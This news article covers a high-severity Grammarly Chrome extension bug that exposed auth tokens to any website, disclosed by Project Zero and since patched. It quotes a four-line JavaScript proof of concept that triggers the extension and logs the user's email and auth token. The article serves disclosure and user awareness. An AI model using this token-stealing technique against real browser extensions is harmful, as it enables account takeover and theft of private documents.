Grammarly Users Need to Update their Chrome Extensions Immediately
A bug allows access to users’ accounts — including private data and documents.
Grammarly has released a patch to fix a vulnerability that would have allowed websites to view your personal data and documents.
A researcher at Google’s Project Zero, Tavis Ormandy, labeled the bug as high severity on account of the extension exposing authentication tokens to all websites.
> The Grammarly Chrome extension (approx ~22M users) exposes its auth tokens to all websites, therefore any website can login to grammarly.com as you and access all your documents, history, logs, and all other data. I’m calling this a high severity bug, because it seems like a pretty severe violation of user expectations.
Ormandy provided a proof of concept that showed how the bug could be exploited with four lines of code.
> document.body.contentEditable=true // Trigger grammarly
> document.querySelector("[data-action=editor]").click() // Click the editor button
> document.querySelector("iframe.gr_-ifr").contentWindow.addEventListener("message", function (a) {console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email
> window.postMessage({grammarly: 1, action: "user" }, "*") // Request user data
That produces a token that can then be used by anyone to log in to Grammarly as you.
Grammarly has over 22 million users, all of whom are vulnerable to this bug until they update their Chrome extension. That includes us at Hashed Out. It’s a good product and worth sticking with despite this bug.
Ormandy published the bug report on Friday, subject to 90-day responsible disclosure guidelines. Grammarly released a patch earlier today.
> Grammarly had fixed the issue and released an update to the Chrome Web Store within a few hours, a really impressive response time. I’ve verified that Mozilla now also has the update, so users should be auto-updated to the fixed version. I’m calling this issue fixed.
So update your browser extensions!